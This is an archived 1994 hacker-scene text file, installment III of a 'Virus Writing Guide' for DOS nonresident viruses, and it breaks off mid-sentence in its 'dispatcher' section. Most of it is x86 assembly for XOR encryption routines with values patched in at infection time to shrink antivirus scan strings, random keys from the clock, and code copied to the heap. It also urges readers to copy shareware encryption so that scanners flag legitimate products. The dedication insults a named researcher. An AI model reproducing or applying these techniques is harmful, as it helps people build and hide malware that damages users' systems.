home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hackers Underworld 2: Forbidden Knowledge
/
Hackers Underworld 2: Forbidden Knowledge.iso
/
VIRUS
/
PS_VIR3.TXT
< prev
next >
Wrap
Text File
|
1994-07-17
|
20KB
|
445 lines
//==// // // /|| // //==== //==// //| //
// // // // //|| // // // // //|| //
//==// //==// //=|| // // // // // || //
// // // // || // // // // // ||//
// // // // || //==== //==== //==// // ||/
/==== // // // /==== /| /|
// // // // // //| //|
===\ // // // ===\ //|| //||
// // \\ // // // ||// ||
====/ // \\ // ====/ // ||/ ||
───────────────────────────────────────────────
DISCLAIMER: I hereby claim to have written this
file.
───────────────────────────────────────────────
DEDICATION: This is dedicated to Patty Hoffman,
that fat bitch who doesn't know her own name,
and to the millions of dumb fools who were so
scared by Michelangelo that they didn't touch
their computers for an entire day.
───────────────────────────────────────────────
GREETS: to all PHALCON/SKISM members especially
Garbageheap, Hellraiser, and Demogorgon.
───────────────────────────────────────────────
Dark Angel's Crunchy Virus Writing Guide
──── ─────── ─────── ───── ─────── ─────
"It's the right thing to do"
────────────────────────────────────────────
INSTALLMENT III: NONRESIDENT VIRII, PART II
────────────────────────────────────────────
Welcome to the third installment of my Virus Writing Guide. In the
previous installment, I covered the primary part of the virus - the
replicator. As promised, I shall now cover the rest of the nonresident
virus and present code which, when combined with code from the previous
installment, will be sufficient to allow anyone to write a simple virus.
Additionally, I will present a few easy tricks and tips which can help
optimise your code.
─────────────
THE CONCEALER
─────────────
The concealer is the most common defense virus writers use to avoid
detection of virii. The most common encryption/decryption routine by far
is the XOR, since it may be used for both encryption and decryption.
encrypt_val dw ? ; Should be somewhere in decrypted area
decrypt:
encrypt:
mov dx, word ptr [bp+encrypt_val]
mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
lea si, [bp+part_to_encrypt_start]
mov di, si
xor_loop:
lodsw
xor ax, dx
stosw
loop xor_loop
The previous routine uses a simple XOR routine to encrypt or decrypt code
in memory. This is essentially the same routine as the one in the first
installment, except it encrypts words rather than bytes. It therefore has
65,535 mutations as opposed to 255 and is also twice as fast. While this
routine is simple to understand, it leaves much to be desired as it is
large and therefore is almost begging to be a scan string. A better method
follows:
encrypt_val dw ?
decrypt:
encrypt:
mov dx, word ptr [bp+encrypt_val]
lea bx, [bp+part_to_encrypt_start]
mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
xor_loop:
xor word ptr [bx], dx
add bx, 2
loop xor_loop
Although this code is much shorter, it is possible to further reduce its
size. The best method is to insert the values for the encryption value,
BX, and CX, in at infection-time.
decrypt:
encrypt:
mov bx, 0FFFFh
mov cx, 0FFFFh
xor_loop:
xor word ptr [bx], 0FFFFh
add bx, 2
loop xor_loop
All the values denoted by 0FFFFh may be changed upon infection to values
appropriate for the infected file. For example, BX should be loaded with
the offset of part_to_encrypt_start relative to the start of the infected
file when the encryption routine is written to the infected file.
The primary advantage of the code used above is the minimisation of scan
code length. The scan code can only consist of those portions of the code
which remain constant. In this case, there are only three or four
consecutive bytes which remain constant. Since the entire encryption
consist of only about a dozen bytes, the size of the scan code is extremely
tiny.
Although the function of the encryption routine is clear, perhaps the
initial encryption value and calculation of subsequent values is not as
lucid. The initial value for most XOR encryptions should be 0. You should
change the encryption value during the infection process. A random
encryption value is desired. The simplest method of obtaining a random
number is to consult to internal clock. A random number may be easily
obtained with a simple:
mov ah, 2Ch ; Get me a random number.
int 21h
mov word ptr [bp+encrypt_val], dx ; Can also use CX
Some encryption functions do not facilitate an initial value of 0. For an
example, take a look at Whale. It uses the value of the previous word as
an encryption value. In these cases, simply use a JMP to skip past the
decryption routine when coding the virus. However, make sure infections
JMP to the right location! For example, this is how you would code such a
virus:
org 100h
start:
jmp past_encryption
; Insert your encryption routine here
past_encryption:
The encryption routine is the ONLY part of the virus which needs to be
unencrypted. Through code-moving techniques, it is possible to copy the
infection mechanism to the heap (memory location past the end of the file
and before the stack). All that is required is a few MOVSW instructions
and one JMP. First the encryption routine must be copied, then the
writing, then the decryption, then the RETurn back to the program. For
example:
lea si, [bp+encryption_routine]
lea di, [bp+heap]
mov cx, encryption_routine_size
push si
push cx
rep movsb
lea si, [bp+writing_routine]
mov cx, writing_routine_size
rep movsb
pop cx
pop si
rep movsb
mov al, 0C3h ; Tack on a near return
stosb
call [bp+heap]
Although most virii, for simplicity's sake, use the same routine for both
encryption and decryption, the above code shows this is completely
unnecessary. The only modification of the above code for inclusion of a
separate decryption routine is to take out the PUSHes and replace the POPs
with the appropriate LEA si and MOV cx.
Original encryption routines, while interesting, might not be the best.
Stolen encryption routines are the best, especially those stolen from
encrypted shareware programs! Sydex is notorious for using encryption in
their shareware programs. Take a look at a shareware program's puny
encryption and feel free to copy it into your own. Hopefully, the anti-
viral developers will create a scan string which will detect infection by
your virus in shareware products simply because the encryption is the same.
Note that this is not a full treatment of concealment routines. A full
text file could be written on encryption/decryption techniques alone. This
is only the simplest of all possible encryption techniques and there are
far more concealment techniques available. However, for the beginner, it
should suffice.
──────────────
THE DISPATCHER
──────────────
The dispatcher is the portion of the virus which restores control back to
the infected program. The dispatchers for EXE and COM files are,
naturally, different.
In COM files, you must restore the bytes which were overwritten by your
virus and then